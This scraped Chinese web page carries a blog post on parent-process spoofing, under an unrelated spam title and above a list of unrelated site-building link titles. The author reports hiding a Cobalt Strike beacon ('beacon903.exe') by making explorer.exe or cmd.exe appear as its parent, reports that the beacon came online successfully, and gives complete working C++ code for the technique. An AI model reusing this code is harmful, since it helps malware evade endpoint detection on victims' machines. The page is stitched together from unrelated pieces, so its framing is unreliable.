当前位置: 首页 > news >正文

交通网站建设做网站找哪里

交通网站建设,做网站找哪里,微信红包制作官网,网站品牌形象设计怎么做首先我发现用calc来做进程隐藏实验是失败的#xff0c;父进程一直都是svhost.exe 那么我用我自己生成的cs木马beacon903.exe试试 试试explorer.exe 再试试cmd.exe 可以看到成功变成cmd.exe 可以看到我们可以通过这种方式虚假父进程 以上我们是直接获得的pid#xff0c;那… 首先我发现用calc来做进程隐藏实验是失败的父进程一直都是svhost.exe 那么我用我自己生成的cs木马beacon903.exe试试 试试explorer.exe 再试试cmd.exe 可以看到成功变成cmd.exe 可以看到我们可以通过这种方式虚假父进程 以上我们是直接获得的pid那么我们将他修改成通过进程名去获得对应pid 可以看到成功上线 给出全部代码 #include Windows.h #include intrin.h #include stdio.h #include iostream #include tchar.h#include TlHelp32.hDWORD GetProcessIDFromName(LPCWSTR name) {PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);HANDLE hProcessSnap CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap INVALID_HANDLE_VALUE) {printf(CreateToolhelp32Snapshot Error!);return false;}BOOL bResult Process32First(hProcessSnap, pe32);int num(0);while (bResult){if (_wcsicmp(pe32.szExeFile, name) 0){return pe32.th32ProcessID;}bResult Process32Next(hProcessSnap, pe32);}CloseHandle(hProcessSnap);return 0;}int _tmain(int argc, _TCHAR* argv[]) {//CHAR* lpExePath (CHAR *)c:\\windows\\system32\\calc.exe;CHAR* lpExePath (CHAR*)C:\\Users\\qiezi\\Desktop\\beacon903.exe;LPCWSTR targetProcessName Lexplorer.exe;/* 根据进程名获取任意进程Id */DWORD pid GetProcessIDFromName(targetProcessName);//遍历进程快照获取进程ID targetProcessName//DWORD pid 17756;if (pid 0){printf(Cant find process pid!\n);return false;}HANDLE handle OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);/* 创建启动信息结构体 */STARTUPINFOEXA si;/* 初始化结构体 */ZeroMemory(si, sizeof(si));/* 设置结构体成员 */si.StartupInfo.cb sizeof(si);SIZE_T lpsize 0;/* 用微软规定的特定的函数初始化结构体 */InitializeProcThreadAttributeList(NULL, 1, 0, lpsize);/* 转换指针到正确类型 */char* temp new char[lpsize];LPPROC_THREAD_ATTRIBUTE_LIST AttributeList (LPPROC_THREAD_ATTRIBUTE_LIST)temp;/* 真正为结构体初始化属性参数 */InitializeProcThreadAttributeList(AttributeList, 1, 0, lpsize);/* 用已构造的属性结构体更新属性表 */if (!UpdateProcThreadAttribute(AttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, handle, sizeof(HANDLE), NULL, NULL)){printf(%s, Fail to update attributes);return 0;}si.lpAttributeList AttributeList;PROCESS_INFORMATION pi;ZeroMemory(pi, sizeof(pi));CreateProcessAsUserA(NULL, 0, lpExePath, 0, 0, 0, EXTENDED_STARTUPINFO_PRESENT, 0, 0, (LPSTARTUPINFOA)si, pi);DeleteProcThreadAttributeList(AttributeList);delete temp;return 0; } 代码主要实现部分为上面红框内伪造父进程最重要的一个 api 就是 InitializeProcThreadAttributeList另外还有个重要的结构体 STARTUPINFOEXA 参考文章 父进程伪造细节——https://www.wangan.com/p/7fygfy13b72f6be2
http://www.zqtcl.cn/news/190450/

相关文章:

  • 网站宽度 像素长沙电商运营培训
  • 备案上个人网站和企业网站的区别app开发多少钱一个
  • 有限公司网站建设 中企动力佛山培训机构招生方案
  • 扫黄打非网站建设专业的高端网站制作公司
  • 做自媒体发视频用哪些网站江西网站建设哪家好
  • wordpress用户列表南宁百度seo排名优化
  • 做网站时如何写接口文档上海网站设计建设公司
  • 网站小图标怎么制作平面设计素材网站推荐
  • 多元网络兰州网站建设惠州网页建站模板
  • 网站建设中首页模板下载网页制作模板保存
  • 宁夏做网站的江苏网站建设的案例展示
  • 网站功能需求文档如何免费域名注册
  • 推广网站的软件包头移动的网站建设
  • 自己制作音乐的软件免费上海seo怎么优化
  • 学vue可以做pc网站网站站长统计怎么弄
  • 做物流的可以在那些网站找客户大淘客网站建设app
  • 石家庄兼职做网站dedecms做视频网站
  • 优化公司怎么优化网站的网站 意义
  • 唯品会一家专门做特卖的网站手机版招聘网站开发技术维护
  • 做短租哪个网站wordpress 4.7
  • 网站换空间 site网站域没到期不能续费吗
  • 找别人做网站要考虑哪些网站导航条设计欣赏
  • mvc网站开发实例wordpress雪人主题2.0
  • 红色好看的网站中山网站建设工作室
  • 如何做喊单网站flask公司网站开发
  • 简单个人网站制作流程自己怎么做卖服装的网站
  • 网站开发公司创业做洁净的网站
  • 要建一个优惠卷网站怎么做企业开发小程序公司
  • 汕尾英文网站建设企业qq手机版
  • 重庆医院门户网站建设做百度网站电话号码